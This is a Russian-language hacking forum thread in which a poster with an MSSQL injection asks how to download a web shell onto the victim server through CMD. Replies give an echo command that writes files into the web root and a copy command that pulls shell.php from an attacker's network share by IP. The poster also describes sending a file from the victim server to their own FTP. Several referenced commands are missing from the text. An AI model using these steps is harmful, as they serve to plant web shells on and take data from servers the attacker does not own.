Доброго времени суток, уважаемые.

Подскажите, есть ли возможность через CMD скачать файл с интернета и сохранить его локально. Т.е. задача такова: имея MSSQL injection и возможность воспользоваться

вместо bla bla bla использовать команду тоторая скачала бы шелл с моего сервера и сохранила в указанное место на уязвимый сервер.

Спасибо за ответы

jangle

про закачку файлов ничего сказать не могу, но есть вариант записать данные в файл, это поможет залить хоть форму загрузки файлов

cmd> echo "тут твой текст" > C:\папка_в_htdocs_\твойфайл

как и в никсах..

как вариант.

НО ...

к сожалению при повторном выполнении команды текст переписывается, а для записи в файл формы нужно будет сделать несколько строк, т.к. SQL INJ не позволяет в моем данном случае вписать длинный текст, кроме того фильтрация некоторых символов которые используются в том же html все таки есть.

к стати, для того что бы строки добавлялись в файл а не переписывались можно использовать

В общем, буду экспериментировать и ОГРОМНЕШЕЕ СПАСИБО за наводочку - буду думать)

copy \\123.123.123.123\my_shared_dir\filename.txt c:\site\shell.php

Этот способ не подходит т.к. копировать можно с рашаренного IP по NetBIOS

С сайта же нет возможности (если я не ошибаюсь)

Пробую локально

Пишет

Этот способ я пробовал, но что- то не так. Не получилось

Реализовал примерно так (может кому надо будет. Тут заливка C:\1.txt с уязвимого сервера на мой FTP)

Вообщем, направление понятно

Konqi, M_script, Nightmarе - БЛАГОДАРЮ!

Тема закрыта